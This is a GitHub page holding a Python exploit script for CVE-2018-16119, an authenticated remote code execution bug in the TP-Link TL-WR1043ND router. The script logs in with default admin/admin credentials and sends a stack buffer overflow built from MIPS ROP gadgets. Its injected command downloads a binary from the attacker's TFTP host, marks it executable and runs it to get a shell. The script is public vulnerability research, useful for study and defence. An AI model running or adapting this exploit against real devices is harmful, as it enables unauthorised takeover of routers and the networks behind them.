Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
96 lines (83 sloc) 3.03 KB
# Title: TP-Link TL-WR1043ND - Authenticated Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-10-19
# Vendor Homepage: https://www.tp-link.com/
# Afected Hardware: https://www.tp-link.com/au/products/details/cat-9_TL-WR1043ND.html
# Version: Tested Over Firmware v2.1
# CVE: CVE-2018-16119
# References:
# https://www.secsignal.org/news/exploiting-route...[WIP]
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16119
# Twitter: @SecSignal
import re
import os
import md5
import sys
import time
import struct
import base64
import urllib
import requests
if os.geteuid() != 0:
exit("You need to have root privileges to run this script. Sorry!\n")
print "[#] Starting TFTP Server, please run as root!"
wifi_interface = "en1" # Yep I am a MAC User!
cmd = "ptftpd -p 69 %s ./tftp_server &" % wifi_interface
os.system(cmd)
time.sleep(1)
print "[#] Trying to obtein a valid Session!"
base_url = "http://192.168.0.1"
login_url = base_url+"/userRpm/LoginRpm.htm?Save=Save"
router_user = "admin"
router_passwd = "admin"
basic_string = base64.b64encode(router_user + ":" + router_passwd)
cookie_auth_string = urllib.quote("Basic "+base64.b64encode(router_user + ":" + md5.new(router_passwd).hexdigest()))
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"Referer": "http://192.168.0.1/",
"Cookie": "Authorization="+cookie_auth_string,
"Authorization": "Basic "+basic_string,
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
session_id = ""
for tries in range(0,5):
try:
r = requests.get(login_url, headers=headers)
session_id = re.findall('[A-Z]{16}', r.text)[0]
except:
pass
if session_id != "":
print "[#] A session was obteined!"
break
if tries == 4:
print "[-] Exploit Failed :("
sys.exit()
print "[#] Crafting Payload"
# Padding for the Overflow
padding = "D"*260
# mov $a0, $s2; jmp $s1
# This will setthe argument of System Syscall
# $s2 contain the p_cmd
# $s2 will be moved to $a0 (First Argument in MIPS Syscall Convention)
# After this the exploit will jump to $s1 (System Address)
# Gadget in libuClib-0.9.30
s0 = "%2A%B2%B7%E8" # Big Endian Address
# System Address in libuClib-0.9.30
s1 = "%2A%B3%21%50" # Big Endian Address
# mov $s2, $sp, jmp s0;
# This is the Stack Pivot
# $sp is pointing to the command to execute
# and will be moved to $s2, after this will jump to $s0
# # Gadget in libuClib-0.9.30
pc = "%2A%AF%84%C0" # Big Endian Address
rop_junk = "X" * 24
p_cmd = "tftp%20-g%20-r%20shh%20192.168.0.103;chmod%20777%20shh;./shh"
rop = pc + rop_junk + p_cmd
payload = padding + s0 + s1 + rop
print "[#] Triggering the Bug"
print "[#] Wait some seconds and enjoy your Shell!!!"
bof_url = base_url+"/"+session_id+"/userRpm/MediaServerFoldersCfgRpm.htm?displayName=bof&shareEntire="+payload+"&no_use_para_just_fix_ie_sub_bug=&Save=Save"
requests.get(bof_url, headers=headers)
You can’t perform that action at this time.